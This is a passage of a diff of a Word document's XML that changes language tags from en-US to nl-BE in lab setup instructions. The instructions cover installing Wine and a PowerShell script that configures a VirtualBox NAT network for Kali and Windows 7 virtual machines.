+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Wine</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3824,15 +4748,15 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>sudo</w:t>
       </w:r>
@@ -3841,9 +4765,63 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> apt-get install wine -y</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>apt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-get </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>install</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -y</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3854,14 +4832,56 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Run wine to make required directories</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Run </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> make </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>required</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> directories</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3982,14 +5002,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t># Variables</w:t>
       </w:r>
@@ -3999,14 +5019,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$KALI_VM = '</w:t>
       </w:r>
@@ -4015,7 +5035,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Kali_NPE</w:t>
       </w:r>
@@ -4024,7 +5044,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
@@ -4034,14 +5054,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$WINDOWS_7_VM = 'Windows_7_NPE'</w:t>
       </w:r>
@@ -4102,14 +5122,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$</w:t>
       </w:r>
@@ -4118,7 +5138,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -4127,7 +5147,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> = "</w:t>
       </w:r>
@@ -4136,7 +5156,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>natNPECV</w:t>
       </w:r>
@@ -4145,7 +5165,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>"</w:t>
       </w:r>
@@ -4155,217 +5175,655 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Append VirtualBox’s installation directory to the PATH environment variable to make things easier</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Append </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VirtualBox’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>installation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> directory </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>PATH environment</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>variable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> make </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>things</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>easier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Env:Path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> += ";C:\Program Files\Oracle\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VirtualBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>\"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t># 1. Setup Nat Network</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Stop DHCP server </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>process</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>it's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> running</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>dhcpProcess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = Get-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Process</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Name </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VBoxDHCP</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ErrorAction</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>SilentlyContinue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>dhcpProcess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Write-Host "Stopping </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VirtualBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> DHCP server..."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Stop-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Process</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Name </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VBoxDHCP</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Force</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Start-Sleep -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Seconds</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Env:Path</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>2  #</w:t>
+      </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> += ";C:\Program Files\Oracle\VirtualBox\"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># 1. Setup Nat Network</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
